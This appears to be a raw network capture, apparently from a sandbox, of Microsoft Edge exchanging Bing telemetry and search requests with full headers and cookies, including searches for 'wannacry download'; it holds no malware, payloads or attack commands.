cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e6a2
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1913
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e68b
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A26%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054498%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22AsResponseLength%22%3A%22734%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%2Cig%3AF2060D51DCE5445385C918F99F2EF2FE%22%2C%22AnswerInfo%22%3A%22MB%3B26%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A17%2C%20%5C%22IG%5C%22%3A%5C%22F2060D51DCE5445385C918F99F2EF2FE%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A26%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199054475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199054498%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22AsResponseLength%22%3A%22734%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%2Cig%3AF2060D51DCE5445385C918F99F2EF2FE%22%2C%22AnswerInfo%22%3A%22MB%3B26%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199054580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannacry%20%2Ci%3A25%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A17%2C%20%5C%22IG%5C%22%3A%5C%22F2060D51DCE5445385C918F99F2EF2FE%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199054582%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e6eb
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1051
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Thu, 17 Oct 2024 21:03:17 GMT
vary: Accept-Encoding
x-eventid: 67117bd155754c91bab5e433f1138530
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-lCUBm3T9iY6lHmTFjyrEQTqt8p/XPRXOxwFWL2pEwMY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Thu, 17 Oct 2024 21:04:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e6b5
set-cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1; Domain=.bing.com; Path=/; Expires=Thu, 17 Oct 2024 23:04:17 GMT; Max-Age=7200; Secure
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67117bd1b69148d8b341a91cda7017c7
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-C/TrgnwQRAI4b64Y0R3yM52rnrjySBFBpIF7B4QTkG0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 54CA3EB68154407A9FA03E8506DB445E Ref B: LON601060107031 Ref C: 2024-10-17T21:04:17Z
content-length: 0
date: Thu, 17 Oct 2024 21:04:17 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:04:17 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199057.1491e6ea
GET

https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0&ajaxnorecss=1&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&format=snrjson&jsoncbid=0&ajaxsydconv=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0&ajaxnorecss=1&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&format=snrjson&jsoncbid=0&ajaxsydconv=1 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
